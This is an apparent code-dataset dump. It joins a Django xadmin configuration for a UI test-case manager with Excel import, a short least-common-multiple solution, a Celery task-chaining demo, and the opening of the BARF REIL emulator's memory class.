                       "update_time"]  # read-only fields; note: exclude has no effect on a field already in readonly_fields
    # exclude = ['case_step'] # hide some fields entirely; note: readonly_fields and exclude conflict with each other
    # inlines = [TestCaseInline] # with TestCaseInline, test cases could be added from the project page; only one level of nesting is supported
    list_editable = all_zi_duan  # fields editable directly on the list page
    refresh_times = [3, 5]  # auto-refresh intervals offered on the list page (3 or 5 seconds)
    list_per_page = 50  # show 50 rows per page (default is 100)
    # fk_fields = ['test_project_id',] # show foreign-key fields; did not take effect
    list_display_links = ["test_case_title", ]  # columns that link to the edit page
    # date_hierarchy = 'add_time' # date drill-down navigation; did not take effect
    show_detail_fields = ["test_project", ]  # fields with an inline "show detail" pop-up
    list_export = ('xls',)  # export formats offered on the list page
    show_bookmarks = True  # whether the bookmark feature is enabled
    # Whether to enable the Excel import plugin.
    import_excel = True  # True shows the plugin, False hides it; this overrides the plugin's own variable
    # Inline: text inputs of the search form.
    class SearchInputTapInputTextInline(object):
        model = SearchInputTapInputText
        exclude = ["add_time","update_time"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: select options of the search form.
    class SearchSelectTapSelectOptionInline(object):
        model = SearchSelectTapSelectOption
        exclude = ["add_time","update_time"]
        extra = 1
        style = 'tab'  # render as tabs
    inlines = [SearchInputTapInputTextInline,SearchSelectTapSelectOptionInline]
    # Override get_context so the dependency dropdown only offers click-scenario
    # cases added by the current user (superusers see everything).
    def get_context(self):
        context = super(SearchAndCheckXadmin, self).get_context() # call the parent class
        if 'form' in context: # boilerplate check
            if self.request.user.is_superuser: # superusers get every ClickAndBack case
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
            else: # other users only get click-scenario cases they wrote themselves
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) # take depend_click_case from the form (same name as the model field), restricted to rows written by the current user
        return context
    def save_models(self): # override save_models to hook extra behaviour into saving
        obj = self.new_obj # the instance being saved
        if self.request.user.is_superuser: # superusers: leave the author field untouched
            obj.save() # save the current case
        else: # other users: record themselves as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id # set write_user to the logged-in user
            obj.save() # save the current case
    def queryset(self): # override queryset so different admins expose different data
        qs = super(SearchAndCheckXadmin, self).queryset() # call the parent class
        if self.request.user.is_superuser: # superusers can see all rows
            return qs
        else:
            qs = qs.filter(write_user=self.request.user) # others only see their own rows
            return qs # return qs
    def post(self, request, *args, **kwargs): # override post to implement the Excel import
        if 'excel' in request.FILES: # an Excel file was uploaded
            excel_file = request.FILES.get('excel', '')
            import xlrd # import xlrd
            # Excel files commonly come as .xls or .xlsx; reading .xls requires formatting_info=True
            # data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx file
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True) # xls file
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            # Import the extracted rows into the database one by one.
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 14:
                while i < len(all_list_1):
                    searchandcheck = SearchAndCheck() # instantiate a SearchAndCheck model object
                    searchandcheck.test_project = all_list_1[i][0] # project (all_list_1[i][j])
                    searchandcheck.test_module = all_list_1[i][1] # module
                    searchandcheck.test_page = all_list_1[i][2] # page under test
                    if all_list_1[i][3] == u"冒烟用例":
                        searchandcheck.case_priority = "P0" # case priority
                    elif all_list_1[i][3] == u"系统的重要功能用例":
                        searchandcheck.case_priority = "P1" # case priority
                    elif all_list_1[i][3] == u"系统的一般功能用例":
                        searchandcheck.case_priority = "P2" # case priority
                    elif all_list_1[i][3] == u"极低级别的用例":
                        searchandcheck.case_priority = "P3" # case priority
                    searchandcheck.test_case_title = all_list_1[i][4] # test case title
                    searchandcheck.is_run_case = all_list_1[i][5] # whether to run the case
                    # if all_list_1[i][4] == "TRUE":
                    #     searchandcheck.is_run_case = 1 # whether to run
                    # elif all_list_1[i][4] == "FALSE":
                    #     searchandcheck.is_run_case = 0 # whether to run
                    searchandcheck.search_ele_find = all_list_1[i][6] # locator style of the search button
                    searchandcheck.search_ele_find_value = all_list_1[i][7] # locator value of the search button
                    searchandcheck.is_with_date = all_list_1[i][8] # whether data is expected in the result
                    # if all_list_1[i][7] == "TRUE":
                    #     searchandcheck.is_with_date = "1" # whether data is expected
                    # elif all_list_1[i][7] == "FALSE":
                    #     searchandcheck.is_with_date = "0" # whether data is expected
                    searchandcheck.result_table_ele_find = all_list_1[i][9] # locator style of the result table
                    searchandcheck.result_table_ele_find_value = all_list_1[i][10] # locator value of the result table
                    searchandcheck.case_counts = all_list_1[i][11] # case_counts
                    if all_list_1[i][12] != None: # if the dependency column is set and the title exists in the DB, store the dependency
                        depend = all_list_1[i][12]
                        depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
                        depend_count = depend_contents.count()
                        if depend_count == 1:
                            for depend_content in depend_contents:
                                searchandcheck.depend_click_case_id = depend_content.id
                    if all_list_1[i][13] != None: # if the author column is set, store the author
                        users = User.objects.all()
                        for user in users:
                            if user.username == all_list_1[i][13]:
                                searchandcheck.write_user_id = user.id # author
                    searchandcheck.save() # persist to the database
                    i = i + 1
                pass
        return super(SearchAndCheckXadmin, self).post(request,*args,**kwargs) # must delegate to the parent's post afterwards, or saving breaks
        # never forget this, otherwise every save through this admin class fails
class DeleteAndCheckXadmin(object):
    """xadmin options for DeleteAndCheck test cases (delete a row, then
    verify the result table and success popup)."""
    # All model fields; reused below so that every column is editable on the list page.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "case_priority",
                   "test_case_title", "is_run_case",
                   "depend_click_case",
                   "delete_ele_find","delete_ele_find_value",
                   "delete_button_find", "delete_button_find_value",
                   "confirm_ele_find",
                   "confirm_ele_find_value",
                   "click_confirm_delay_time",
                   "is_click_cancel",
                   "cancel_ele_find","cancel_ele_find_value",
                   "is_submit_success",
                   "popup_ele_find","popup_ele_find_value","popup_text",
                   "is_signel_page","page_number_xpath",
                   "result_table_ele_find","result_table_ele_find_value",
                   "table_colnum_counts",
                   "case_counts", "write_user",
                   "add_time", "update_time"]
    list_display = ["test_project", "test_module", "test_page",
                    "case_priority",
                    "test_case_title", "is_run_case","depend_click_case",
                    "delete_ele_find", "delete_ele_find_value",
                    "delete_button_find", "delete_button_find_value",
                    "confirm_ele_find",
                    "confirm_ele_find_value",
                    "click_confirm_delay_time",
                    "is_click_cancel",
                    "cancel_ele_find", "cancel_ele_find_value",
                    "is_submit_success",
                    "popup_ele_find", "popup_ele_find_value", "popup_text",
                    "is_signel_page", "page_number_xpath",
                    "result_table_ele_find", "result_table_ele_find_value",
                    "table_colnum_counts",
                    "case_counts",
                    "go_to"]  # columns shown on the list page
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "write_user"]  # fields offered as list-page filters
    search_fields = ["test_project", "test_module", "test_page",
                     "test_case_title"]  # fields covered by the search box
    model_icon = "fa fa-file-text"  # icon used for this model in the UI
    ordering = ["-add_time"]  # default ordering: newest first (by add_time)
    readonly_fields = ["write_user", "add_time",
                       "update_time"]  # read-only fields; note: exclude has no effect on a field already in readonly_fields
    # exclude = ['case_step'] # hide some fields entirely; note: readonly_fields and exclude conflict with each other
    # inlines = [TestCaseInline] # with TestCaseInline, test cases could be added from the project page; only one level of nesting is supported
    list_editable = all_zi_duan  # fields editable directly on the list page
    refresh_times = [3, 5]  # auto-refresh intervals offered on the list page (3 or 5 seconds)
    list_per_page = 50  # show 50 rows per page (default is 100)
    # fk_fields = ['test_project_id',] # show foreign-key fields; did not take effect
    list_display_links = ["test_case_title", ]  # columns that link to the edit page
    # date_hierarchy = 'add_time' # date drill-down navigation; did not take effect
    show_detail_fields = ["test_project", ]  # fields with an inline "show detail" pop-up
    list_export = ('xls',)  # export formats offered on the list page
    show_bookmarks = True  # whether the bookmark feature is enabled
    # Whether to enable the Excel import plugin.
    import_excel = True  # True shows the plugin, False hides it; this overrides the plugin's own variable
    # Override get_context so the dependency dropdown only offers click-scenario
    # cases added by the current user (superusers see everything).
    def get_context(self):
        context = super(DeleteAndCheckXadmin, self).get_context() # call the parent class
        if 'form' in context: # boilerplate check
            if self.request.user.is_superuser: # superusers get every ClickAndBack case
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
            else: # other users only get click-scenario cases they wrote themselves
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) # take depend_click_case from the form (same name as the model field), restricted to rows written by the current user
        return context
    def save_models(self): # override save_models to hook extra behaviour into saving
        obj = self.new_obj # the instance being saved
        if self.request.user.is_superuser: # superusers: leave the author field untouched
            obj.save() # save the current case
        else: # other users: record themselves as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id # set write_user to the logged-in user
            obj.save() # save the current case
    def queryset(self): # override queryset so different admins expose different data
        qs = super(DeleteAndCheckXadmin, self).queryset() # call the parent class
        if self.request.user.is_superuser: # superusers can see all rows
            return qs
        else:
            qs = qs.filter(write_user=self.request.user) # others only see their own rows
            return qs # return qs
    def post(self, request, *args, **kwargs): # override post to implement the Excel import
        if 'excel' in request.FILES: # an Excel file was uploaded
            excel_file = request.FILES.get('excel', '')
            import xlrd # import xlrd
            # Excel files commonly come as .xls or .xlsx; reading .xls requires formatting_info=True
            # data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx file
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True) # xls file
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            # Import the extracted rows into the database one by one.
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 28:
                while i < len(all_list_1):
                    deleteandcheck = DeleteAndCheck() # instantiate a DeleteAndCheck model object
                    deleteandcheck.test_project = all_list_1[i][0] # project (all_list_1[i][j])
                    deleteandcheck.test_module = all_list_1[i][1] # module
                    deleteandcheck.test_page = all_list_1[i][2] # page under test
                    if all_list_1[i][3] == u"冒烟用例":
                        deleteandcheck.case_priority = "P0" # case priority
                    elif all_list_1[i][3] == u"系统的重要功能用例":
                        deleteandcheck.case_priority = "P1" # case priority
                    elif all_list_1[i][3] == u"系统的一般功能用例":
                        deleteandcheck.case_priority = "P2" # case priority
                    elif all_list_1[i][3] == u"极低级别的用例":
                        deleteandcheck.case_priority = "P3" # case priority
                    deleteandcheck.test_case_title = all_list_1[i][4] # test case title
                    deleteandcheck.is_run_case =all_list_1[i][5] # whether to run the case
                    if all_list_1[i][6] != None: # if the dependency column is set and the title exists in the DB, store the dependency
                        depend = all_list_1[i][6]
                        depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
                        depend_count = depend_contents.count()
                        if depend_count == 1:
                            for depend_content in depend_contents:
                                deleteandcheck.depend_click_case_id = depend_content.id
                    deleteandcheck.delete_ele_find = all_list_1[i][7] # locator style of the element to delete
                    deleteandcheck.delete_ele_find_value = all_list_1[i][8] # locator value of the element to delete
                    deleteandcheck.delete_button_find = all_list_1[i][9] # locator style of the delete button
                    deleteandcheck.delete_button_find_value = all_list_1[i][10] # locator value of the delete button
                    deleteandcheck.confirm_ele_find = all_list_1[i][11] # locator style of the confirm button
                    deleteandcheck.confirm_ele_find_value = all_list_1[i][12] # locator value of the confirm button
                    deleteandcheck.click_confirm_delay_time = all_list_1[i][13] # delay (in seconds) after clicking confirm
                    deleteandcheck.is_click_cancel = all_list_1[i][14] # whether to click the cancel button
                    deleteandcheck.cancel_ele_find = all_list_1[i][15] # locator style of the cancel button
                    deleteandcheck.cancel_ele_find_value = all_list_1[i][16] # locator value of the cancel button
                    deleteandcheck.is_submit_success = all_list_1[i][17] # whether the submit should succeed
                    deleteandcheck.popup_ele_find = all_list_1[i][18] # locator style of an element in the delete-success popup
                    deleteandcheck.popup_ele_find_value = all_list_1[i][19] # locator value of that popup element
                    deleteandcheck.popup_text = all_list_1[i][20] # expected text of that popup element
                    deleteandcheck.is_signel_page = all_list_1[i][21] # whether the result is a single page
                    deleteandcheck.page_number_xpath = all_list_1[i][22] # xpath of the pagination layer
                    deleteandcheck.result_table_ele_find = all_list_1[i][23] # locator style of the result table
                    deleteandcheck.result_table_ele_find_value = all_list_1[i][24] # locator value of the result table
                    deleteandcheck.table_colnum_counts = all_list_1[i][25] # total number of columns in the result table
                    deleteandcheck.case_counts = all_list_1[i][26] # case_counts
                    if all_list_1[i][27] != None: # if the author column is set, store the author
                        users = User.objects.all()
                        for user in users:
                            if user.username == all_list_1[i][27]:
                                deleteandcheck.write_user_id = user.id # author
                    deleteandcheck.save() # persist to the database
                    i = i + 1
                pass
        return super(DeleteAndCheckXadmin,self).post(request,*args,**kwargs) # must delegate to the parent's post afterwards, or saving breaks
        # never forget this, otherwise every save through this admin class fails
class EditAndCheckXadmin(object):
    """xadmin options for EditAndCheck test cases (edit a row, then verify
    the result table)."""
    # All model fields; reused below so that every column is editable on the list page.
    all_zi_duan = ["id", "test_project", "test_module", "test_page",
                   "case_priority",
                   "test_case_title", "is_run_case",
                   # "depend_new_add_and_check_case",
                   "depend_click_case",
                   "edit_ele_find","edit_ele_find_value","edit_button_find","edit_button_find_value",
                   "confirm_ele_find",
                   "confirm_ele_find_value",
                   "click_confirm_delay_time",
                   "is_click_cancel",
                   "cancel_ele_find","cancel_ele_find_value",
                   "is_submit_success",
                   "is_signel_page","page_number_xpath",
                   "result_table_ele_find","result_table_ele_find_value",
                   "table_colnum_counts",
                   "case_counts", "write_user",
                   "add_time", "update_time"]
    list_display = ["test_project", "test_module", "test_page",
                    "case_priority",
                    "test_case_title", "is_run_case",
                    # "depend_new_add_and_check_case",
                    "depend_click_case",
                    "edit_ele_find", "edit_ele_find_value", "edit_button_find", "edit_button_find_value",
                    "confirm_ele_find",
                    "confirm_ele_find_value",
                    "click_confirm_delay_time",
                    "is_click_cancel",
                    "cancel_ele_find", "cancel_ele_find_value",
                    "is_submit_success",
                    "is_signel_page", "page_number_xpath",
                    "result_table_ele_find", "result_table_ele_find_value",
                    "table_colnum_counts",
                    "case_counts",
                    "go_to"]  # columns shown on the list page
    list_filter = ["test_project", "test_module", "test_page",
                   "test_case_title", "is_run_case",
                   "write_user"]  # fields offered as list-page filters
    search_fields = ["test_project", "test_module", "test_page",
                     "test_case_title"]  # fields covered by the search box
    model_icon = "fa fa-file-text"  # icon used for this model in the UI
    ordering = ["-add_time"]  # default ordering: newest first (by add_time)
    readonly_fields = ["write_user", "add_time",
                       "update_time"]  # read-only fields; note: exclude has no effect on a field already in readonly_fields
    # exclude = ['case_step'] # hide some fields entirely; note: readonly_fields and exclude conflict with each other
    # inlines = [TestCaseInline] # with TestCaseInline, test cases could be added from the project page; only one level of nesting is supported
    list_editable = all_zi_duan  # fields editable directly on the list page
    refresh_times = [3, 5]  # auto-refresh intervals offered on the list page (3 or 5 seconds)
    list_per_page = 50  # show 50 rows per page (default is 100)
    # fk_fields = ['test_project_id',] # show foreign-key fields; did not take effect
    list_display_links = ["test_case_title", ]  # columns that link to the edit page
    # date_hierarchy = 'add_time' # date drill-down navigation; did not take effect
    show_detail_fields = ["test_project", ]  # fields with an inline "show detail" pop-up
    list_export = ('xls',)  # export formats offered on the list page
    show_bookmarks = True  # whether the bookmark feature is enabled
    # Whether to enable the Excel import plugin.
    import_excel = True  # True shows the plugin, False hides it; this overrides the plugin's own variable
    # Inline: text inputs of the edit form.
    class InputTapInputTextInline(object):
        model = InputTapInputText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: file inputs of the edit form.
    class InputTapInputFileInline(object):
        model = InputTapInputFile
        exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: date/time inputs of the edit form.
    class InputTapInputDateTimeInline(object):
        model = InputTapInputDateTime
        exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: radio buttons / re-selection labels of the edit form.
    class RadioAndReelectionLabelInline(object):
        model = RadioAndReelectionLabel
        exclude = ["add_time", "update_time","newaddandcheck","editandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: select options of the edit form.
    class SelectTapSelectOptionInline(object):
        model = SelectTapSelectOption
        exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: assertion tip texts.
    class AssertTipTextInline(object):
        model = AssertTipText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck","loginandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    # Inline: iframe body text inputs.
    class IframeBodyInputTextInline(object):
        model = IframeBodyInputText
        exclude = ["add_time","update_time","newaddandcheck","editandcheck"]
        extra = 1
        style = 'tab'  # render as tabs
    inlines = [InputTapInputTextInline,InputTapInputFileInline,InputTapInputDateTimeInline,
               RadioAndReelectionLabelInline,
               SelectTapSelectOptionInline,AssertTipTextInline,
               IframeBodyInputTextInline,]
    # Override get_context so the dependency dropdown only offers click-scenario
    # cases added by the current user (superusers see everything).
    def get_context(self):
        context = super(EditAndCheckXadmin, self).get_context() # call the parent class
        if 'form' in context: # boilerplate check
            if self.request.user.is_superuser: # superusers get every ClickAndBack case
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.all()
            else: # other users only get click-scenario cases they wrote themselves
                context['form'].fields['depend_click_case'].queryset = ClickAndBack.objects.filter(write_user=self.request.user) # take depend_click_case from the form (same name as the model field), restricted to rows written by the current user
        return context
    def save_models(self): # override save_models to hook extra behaviour into saving
        obj = self.new_obj # the instance being saved
        if self.request.user.is_superuser: # superusers: leave the author field untouched
            obj.save() # save the current case
        else: # other users: record themselves as the author automatically
            user = User.objects.get(username=self.request.user)
            obj.write_user_id = user.id # set write_user to the logged-in user
            obj.save() # save the current case
    def queryset(self): # override queryset so different admins expose different data
        qs = super(EditAndCheckXadmin, self).queryset() # call the parent class
        if self.request.user.is_superuser: # superusers can see all rows
            return qs
        else:
            qs = qs.filter(write_user=self.request.user) # others only see their own rows
            return qs # return qs
    def post(self, request, *args, **kwargs): # override post to implement the Excel import
        if 'excel' in request.FILES: # an Excel file was uploaded
            excel_file = request.FILES.get('excel', '')
            import xlrd # import xlrd
            # Excel files commonly come as .xls or .xlsx; reading .xls requires formatting_info=True
            # data = xlrd.open_workbook(filename=None, file_contents=excel_file.read()) # xlsx file
            exceldata = xlrd.open_workbook(filename=None, file_contents=excel_file.read(),
                                           formatting_info=True) # xls file
            from .analyzexls import Analyzexls
            analyzexls = Analyzexls()
            # Import the extracted rows into the database one by one.
            all_list_1 = analyzexls.get_sheets_mg(exceldata, 0)
            i = 0
            if len(all_list_1[0]) == 25:
                while i < len(all_list_1):
                    editandcheck = EditAndCheck() # instantiate an EditAndCheck model object
                    editandcheck.test_project = all_list_1[i][0] # project (all_list_1[i][j])
                    editandcheck.test_module = all_list_1[i][1] # module
                    editandcheck.test_page = all_list_1[i][2] # page under test
                    if all_list_1[i][3] == u"冒烟用例":
                        editandcheck.case_priority = "P0" # case priority
                    elif all_list_1[i][3] == u"系统的重要功能用例":
                        editandcheck.case_priority = "P1" # case priority
                    elif all_list_1[i][3] == u"系统的一般功能用例":
                        editandcheck.case_priority = "P2" # case priority
                    elif all_list_1[i][3] == u"极低级别的用例":
                        editandcheck.case_priority = "P3" # case priority
                    editandcheck.test_case_title = all_list_1[i][4] # test case title
                    editandcheck.is_run_case =all_list_1[i][5] # whether to run the case
                    if all_list_1[i][6] != None: # if the dependency column is set and the title exists in the DB, store the dependency
                        depend = all_list_1[i][6]
                        depend_contents = ClickAndBack.objects.filter(test_case_title=depend)
                        depend_count = depend_contents.count()
                        if depend_count == 1:
                            for depend_content in depend_contents:
                                editandcheck.depend_click_case_id = depend_content.id
                    editandcheck.edit_ele_find = all_list_1[i][7] # locator style of the element to edit
                    editandcheck.edit_ele_find_value = all_list_1[i][8] # locator value of the element to edit
                    editandcheck.edit_button_find = all_list_1[i][9] # locator style of the edit button
                    editandcheck.edit_button_find_value = all_list_1[i][10] # locator value of the edit button
                    editandcheck.confirm_ele_find = all_list_1[i][11] # locator style of the confirm button
                    editandcheck.confirm_ele_find_value = all_list_1[i][12] # locator value of the confirm button
                    editandcheck.click_confirm_delay_time = all_list_1[i][13] # delay (in seconds) after clicking confirm
                    editandcheck.is_click_cancel = all_list_1[i][14] # whether to click the cancel button
                    editandcheck.cancel_ele_find = all_list_1[i][15] # locator style of the cancel button
                    editandcheck.cancel_ele_find_value = all_list_1[i][16] # locator value of the cancel button
                    editandcheck.is_submit_success = all_list_1[i][17] # whether the submit should succeed
                    editandcheck.is_signel_page = all_list_1[i][18] # whether the result is a single page
                    editandcheck.page_number_xpath = all_list_1[i][19] # xpath of the pagination layer
                    editandcheck.result_table_ele_find = all_list_1[i][20] # locator style of the result table
                    editandcheck.result_table_ele_find_value = all_list_1[i][21] # locator value of the result table
                    editandcheck.table_colnum_counts = all_list_1[i][22] # total number of columns in the result table
                    editandcheck.case_counts = all_list_1[i][23] # case_counts
                    if all_list_1[i][24] != None: # if the author column is set, store the author
                        users = User.objects.all()
                        for user in users:
                            if user.username == all_list_1[i][24]:
                                editandcheck.write_user_id = user.id # author
                    editandcheck.save() # persist to the database
                    i = i + 1
                pass
        return super(EditAndCheckXadmin,self).post(request,*args,**kwargs) # must delegate to the parent's post afterwards, or saving breaks
        # never forget this, otherwise every save through this admin class fails
# Register each model together with its xadmin options class.
xadmin.site.register(LoginAndCheck,LoginAndCheckXadmin) # register LoginAndCheck with xadmin
xadmin.site.register(ClickAndBack, ClickAndBackXAdmin) # register ClickAndBack with xadmin
xadmin.site.register(NewAddAndCheck,NewAddAndCheckXadmin) # register NewAddAndCheck with xadmin
xadmin.site.register(SearchAndCheck,SearchAndCheckXadmin) # register SearchAndCheck with xadmin
xadmin.site.register(DeleteAndCheck,DeleteAndCheckXadmin) # register DeleteAndCheck with xadmin
xadmin.site.register(EditAndCheck,EditAndCheckXadmin) # register EditAndCheck with xadmin
| [
"wawj900805"
] | wawj900805 |
61c120b8fd81352b68514fa25a7440b9e07c6d13 | 7807d8d9d109a3e272fffed91bf841201da39256 | /trans_NTL_1_C/aaa119_NTL_1_C_kotonoha.py | b982f55f4bfddd7e6698b1ac8f94bef517d3ba62 | [] | no_license | y-akinobu/AOJ_to_Kotonoha | 0e8df43393964fcdd5df06c75545091bd6c0c2e2 | 5a694a55a3d85e3fbc4a07b57edc4374556db9a1 | refs/heads/main | 2023-02-05T15:33:16.581177 | 2020-12-30T16:14:44 | 2020-12-30T16:14:44 | 325,524,216 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | [#Document [# 'coding: utf-8']][#Document [# '76']]
# AOJ NTL-1-C: least common multiple of n integers.
#
# ``fractions.gcd`` was deprecated in Python 3.5 and removed in 3.9;
# use ``math.gcd`` and keep a fallback for very old interpreters.
try:
    from math import gcd  # Python 3.5+
except ImportError:  # pragma: no cover - pre-3.5 interpreters
    from fractions import gcd


def lcm(x, y):
    """Return the least common multiple of two positive integers."""
    return x * y // gcd(x, y)


def main():
    """Read ``n`` and then ``n`` integers; print their LCM."""
    n = int(input())
    a = list(map(int, input().split()))
    ans = a[0]
    # Fold the LCM across the remaining n-1 values.
    for i in range(1, n):
        ans = lcm(ans, a[i])
    print(ans)


if __name__ == "__main__":
    main()
"[email protected]"
] | |
8f8f3812524da3845410fcca49e1304a214732b9 | 33421188df7d7dcf2ee9be0771b0f2fe1ffad4f5 | /2014/Codemotion/celery/examples/canvas/tasks.py | 852cca47ec68a4b448671ea1b3a13cf41af94abc | [
"CC-BY-4.0"
] | permissive | Gustavo17/ponencias | c0482fc7a72d7d4d829a54b94775e77c81ca5d97 | effb002b0300fe57d26776654b61a2396010da40 | refs/heads/master | 2021-01-13T09:18:13.837313 | 2014-11-21T04:58:11 | 2014-11-21T04:58:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from celery import Celery, group, chain, chord
import time
# Celery application: AMQP result backend, RabbitMQ broker on localhost.
app = Celery('tasks', backend='amqp', broker='amqp://guest@localhost//')
@app.task
def fetch_url(url):
    """Stand-in download task: always returns a fixed payload."""
    payload = "CONTENT DATA"
    return payload
@app.task
def lowcase(content):
    """Lower-case the given text."""
    lowered = content.lower()
    return lowered
@app.task
def split(content):
    """Split the text on whitespace into a list of tokens."""
    tokens = content.split()
    return tokens
@app.task
def flat(data):
    """Flatten one level of nesting from a list of lists."""
    flattened = []
    for sublist in data:
        for item in sublist:
            flattened.append(item)
    return flattened
@app.task
def sleeper(data):
    """Pause for one second, then pass *data* through unchanged."""
    delay_seconds = 1
    time.sleep(delay_seconds)
    return data
@app.task
def join(data):
    """Concatenate the items of *data* with '#' separators."""
    separator = "#"
    return separator.join(data)
if __name__ == "__main__":
    # Canvas demo: a chord that fetches/lowercases/splits each URL in
    # parallel, then flattens, sleeps on and joins the collected results.
    res = chord([chain(fetch_url.s(url), lowcase.s(), split.s()) for url in ["www.google.com", "www.facebook.com"]], flat.s() | sleeper.s() | join.s())()
    print(res.get())
| [
"[email protected]"
] | |
66e9fcb90504ec32f0a70a93da82359f2ac7ebb4 | a96033c99f6dc8994c09928153d51ac249f4d4ff | /barf/barf/core/reil/reilemulator.py | 178284edce38528fd8192a5d317b0ac2ec660f9a | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | ignaeche/barf-project | 0a1d8c77086fb7fc13d3b8282aac63dc84f58b85 | 075782045f52924fbb1312140b4c525f75e85e82 | refs/heads/master | 2021-01-15T09:19:01.103284 | 2015-09-22T18:08:12 | 2015-09-22T18:08:12 | 43,160,150 | 0 | 0 | null | 2015-09-25T16:29:18 | 2015-09-25T16:29:18 | null | UTF-8 | Python | false | false | 35,549 | py | # Copyright (c) 2014, Fundacion Dr. Manuel Sadosky
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains all the necesary classes to emulate REIL
instructions. So far, it only handles concrete values.
The emulator is compose of two main classes. The emulator itself,
**ReilEmulator** and a memory component **ReilMemory**.
ReilEmulator
------------
It has two main methods, e.i., **emulate** and **emulate_lite**. The
first, emulates REIL instructions completely and takes as parameters a
list of instruction and a start address (REIL address). The second, is a
more performing emulation where the list of instruction is execute from
beginning to end not considering branches.
ReilMemory
----------
Byte addressable memory based on a dictionary.
"""
import logging
import random
from barf.core.reil.reil import ReilImmediateOperand
from barf.core.reil.reil import ReilMnemonic
from barf.core.reil.reil import ReilRegisterOperand
from barf.core.reil.reil import ReilContainerInvalidAddressError
from barf.utils.utils import extract_sign_bit
from barf.utils.utils import extract_value
from barf.utils.utils import insert_value
from barf.utils.utils import twos_complement
# Module-level logger.
logger = logging.getLogger("reilemulator")

# When True, ReilCpu.execute prints each REIL instruction as it runs.
DEBUG = False
# DEBUG = True

REIL_MEMORY_ENDIANNESS_LE = 0x0  # Little Endian
REIL_MEMORY_ENDIANNESS_BE = 0x1  # Big Endian
class ReilMemory(object):

    """A REIL memory model (byte addressable).

    Memory is backed by a dictionary mapping byte addresses to byte
    values, stored in little endian order. Reading a never-written
    address initializes it with a random byte (emulating uninitialized
    memory) which is then remembered for subsequent reads.
    """

    def __init__(self, address_size):
        # TODO: Set endianness through a parameter.
        # TODO: Check that all addresses have size address_size.
        # TODO: Use endianness parameter.

        # Memory's address size.
        self.__address_size = address_size

        # Memory's endianness.
        self.__endianness = REIL_MEMORY_ENDIANNESS_LE

        # Dictionary that implements the memory itself.
        self._memory = {}

    # Read methods
    # ======================================================================== #
    def read(self, address, size):
        """Read `size` bytes starting at `address` (little endian)."""
        value = 0x0

        # NOTE: `range` (not Python 2's `xrange`) keeps this working on
        # both Python 2 and 3.
        for i in range(0, size):
            value = self._read_byte(address + i) << (i * 8) | value

        return value

    def _read_byte(self, address):
        """Read a byte from memory, initializing unseen locations randomly."""
        # Initialize memory location with a random value.
        if address not in self._memory:
            self._memory[address] = random.randint(0x00, 0xff)

        return self._memory[address]

    # Write methods
    # ======================================================================== #
    def write(self, address, size, value):
        """Write the `size` low-order bytes of `value` at `address`."""
        for i in range(0, size):
            self.__write_byte(address + i, (value >> (i * 8)) & 0xff)

    def __write_byte(self, address, value):
        """Write a single byte (masked to 8 bits) in memory."""
        self._memory[address] = value & 0xff

    # Misc methods
    # ======================================================================== #
